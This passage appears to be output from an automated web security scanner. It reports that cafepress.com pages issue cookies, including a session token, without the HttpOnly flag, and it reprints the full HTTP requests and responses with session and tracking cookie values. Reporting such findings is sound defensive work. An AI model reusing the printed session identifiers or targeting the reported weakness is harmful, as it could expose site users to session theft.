__utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 93172 Date: Sun, 26 Dec 2010 13:44:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93172 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.5. http://www.cafepress.com/+aprons
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+aprons
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+aprons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 60330 Date: Sun, 26 Dec 2010 13:46:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/ Set-Cookie: cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60330 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.6. http://www.cafepress.com/+baby-blanket
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+baby-blanket
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+baby-blanket HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 58677 Date: Sun, 26 Dec 2010 13:46:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/ Set-Cookie: cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58677 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.7. http://www.cafepress.com/+baby-bodysuits
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+baby-bodysuits
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+baby-bodysuits HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 59167 Date: Sun, 26 Dec 2010 13:46:59 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/ Set-Cookie: cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59167 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.8. http://www.cafepress.com/+baby-hat
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+baby-hat
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+baby-hat HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 58517 Date: Sun, 26 Dec 2010 13:46:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/ Set-Cookie: cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58517 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.9. http://www.cafepress.com/+bags
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+bags
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+bags HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59533 Date: Sun, 26 Dec 2010 13:46:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/ Set-Cookie: cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59533 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.10. http://www.cafepress.com/+boxers
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+boxers
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+boxers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
